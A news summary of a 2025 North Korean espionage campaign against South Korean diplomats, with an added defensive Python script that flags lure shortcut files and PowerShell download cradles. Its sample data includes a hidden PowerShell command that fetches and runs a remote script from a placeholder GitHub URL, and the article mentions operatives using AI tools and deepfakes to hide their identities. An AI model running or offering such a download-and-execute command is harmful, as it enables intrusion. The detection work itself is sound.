Between March and July 2025, North Korean hackers launched a cyber espionage campaign against South Korean diplomatic missions. At least 19 spear-phishing emails were sent, impersonating trusted officials and inviting recipients to fake meetings or events. These emails were written in multiple languages and often included realistic diplomatic details.
The attackers used GitHub as a covert command-and-control channel and relied on cloud services like Dropbox and Daum Cloud to deliver a modified version of Xeno RAT, a remote access trojan. The malware was hidden in password-protected ZIP files containing disguised shortcut files that executed PowerShell scripts. These scripts fetched additional payloads from GitHub and Dropbox while collecting system data.
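The delivery chain above (password-protected ZIP, a shortcut file that runs PowerShell, PowerShell that pulls stages from public cloud hosts) leaves two cheap detection points for a defender: the archive member list and the process-creation telemetry. The following is an added example, not code from the article or from Trellix, showing both checks on constructed data. The indicator regexes, the `STAGING_HOSTS` list (GitHub and Dropbox come from the summary; the Daum host name is an assumption) and the Sysmon-style field names are assumptions, and the ZIP and log lines are constructed, not real samples.

```python
"""Triage helpers for the ZIP -> .lnk -> PowerShell -> cloud-fetch chain.
Added example with constructed data; field names follow Sysmon EventID 1
(Image, ParentImage, CommandLine) as an assumption about the log source."""
import io
import json
import re
import zipfile

# Hosts the summary names as payload/C2 channels (daum.net is an assumption).
STAGING_HOSTS = ("github.com", "raw.githubusercontent.com", "dropbox.com", "daum.net")

# Assumed indicator patterns for a PowerShell download cradle and for the
# flags a lure typically uses to keep the console out of sight.
CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Start-BitsTransfer|curl\s)",
    re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b", re.IGNORECASE)


def suspicious_archive_members(zip_bytes):
    """Return shortcut members that look like document lures (e.g. 'invite.pdf.lnk').
    Member names live in the central directory in cleartext, so this works on a
    password-protected archive without knowing the password."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if name.endswith(".lnk"):
                # a doubled extension ("report.pdf.lnk") is the usual tell
                flagged.append({
                    "member": info.filename,
                    "double_extension": len(name.split(".")) >= 3,
                    "encrypted": bool(info.flag_bits & 0x1),  # bit 0 = encrypted
                    "size": info.file_size,
                })
    return flagged


def score_process_event(event):
    """Score one process-creation record; returns the list of matched indicators."""
    reasons = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if parent.endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer (shortcut double-click pattern)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden/encoded/no-profile flags")
    if CRADLE_RE.search(cmd) and any(h in cmd.lower() for h in STAGING_HOSTS):
        reasons.append("download cradle to public staging host")
    return reasons


def triage_log(lines):
    """Run the scorer over JSON-lines events; return (index, reasons) for events
    that hit at least two indicators. Malformed lines are skipped."""
    hits = []
    for i, line in enumerate(lines):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        reasons = score_process_event(event)
        if len(reasons) >= 2:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell.exe -nop -w hidden -c \"iwr "
                               "https://raw.githubusercontent.com/example/x/main/s.ps1 | iex\""}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Program Files\Admin\deploy.exe",
                "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"}),
    "not json at all",
]


def build_sample_zip():
    """Constructed lure archive: a doubled-extension shortcut beside a decoy file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invitation_Reception.pdf.lnk", b"L" + b"\x00" * 64)
        zf.writestr("readme.txt", b"decoy")
    return buf.getvalue()


if __name__ == "__main__":
    print(suspicious_archive_members(build_sample_zip()))
    print(triage_log(SAMPLE_EVENTS))
```

The two-indicator threshold in `triage_log` is a design choice: an explorer-spawned PowerShell alone is noisy on admin workstations, and a cradle alone is common in legitimate deployment scripts, but the combination with hidden-window flags and a public file host is rare outside lure execution. The archive check deliberately reads only metadata, so it can run on mail-gateway attachments before anyone supplies the password.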
The campaign is believed to be the work of the Kimsuky group, although some evidence points to Chinese involvement. Activity patterns matched Chinese time zones, and a pause during Chinese holidays added to the suspicion. Trellix researchers suggest the operation may involve North Korean operatives working from China, a Chinese group mimicking Kimsuky, or a joint effort.
Separately, CrowdStrike reported over 320 cases of North Koreans posing as remote IT workers to infiltrate companies and generate revenue. These operatives use AI tools like Microsoft Copilot, deepfake technology, and multiple email accounts (mostly Gmail) to conceal their identities and perform tech-related jobs. Some even run "laptop farms" to simulate working from target countries.
The use of Korean services and infrastructure helps these actors blend into South Korean networks, making detection more difficult.